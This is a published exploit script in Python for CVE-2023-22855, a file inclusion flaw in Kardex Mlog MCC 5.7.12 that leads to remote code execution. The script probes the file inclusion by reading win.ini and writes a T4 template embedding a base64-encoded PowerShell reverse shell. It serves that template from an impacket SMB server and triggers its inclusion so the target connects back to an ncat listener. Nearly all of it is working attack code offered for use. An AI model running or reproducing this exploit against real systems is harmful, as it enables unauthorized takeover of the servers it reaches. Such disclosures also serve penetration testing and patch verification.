Kardex Mlog MCC 5.7.12 Remote Code Execution

                							

                #!/usr/bin/env python3

# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#
import requests, argparse, base64, os, threading
from impacket import smbserver

def probe(target):
  headers = {
    "Accept-Encoding": "deflate"
  }
  res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
  if "fonts" in res.text:
    return True
  else:
    return False

def gen_payload(lhost, lport):
  rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
  rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
  payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""

  return payload

def start_smb_server(lhost):
  server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
  server.addShare("SHARE", os.getcwd(), '')
  server.setSMB2Support(True)
  server.setSMBChallenge('')
  server.start()

def trigger_vulnerability(target, lhost):
  headers = {
    "Accept-Encoding": "deflate"
  }

  requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)

def main():
  # Well, args
  parser = argparse.ArgumentParser()
  parser.add_argument('-t', '--target', help='Target host url', required=True)
  parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
  parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
  args = parser.parse_args()

  # Probe if target is vulnerable
  print("[*] Probing target")
  if probe(args.target):
    print("[+] Target is alive and File Inclusion working")
  else:
    print("[-] Target is not alive or File Inclusion not working")
    exit(-1)

  # Write payload to file
  print("[*] Writing 'exploit.t4' payload to be included later on")
  with open("exploit.t4", 'w') as template:
    template.write(gen_payload(args.lhost, args.lport))

  template.close()

  # Start smb server in background
  print("[*] Starting SMB Server in the background")
  smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
  smb_server_thread.start()

  # Rev Shell reminder
  print("[!] At this point you should have spawned a rev shell listener")
  print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
  print("[?] Are you ready to trigger the vuln? Then press enter!")
  input() # Wait for input then continue

  # Trigger vulnerability
  print("[*] Now triggering the vulnerability")
  trigger_vulnerability(args.target, args.lhost)

  # Exit
  print("[+] Enjoy your shell. Bye!")
  os._exit(1)



if __name__ == "__main__":
  main()
            

<p>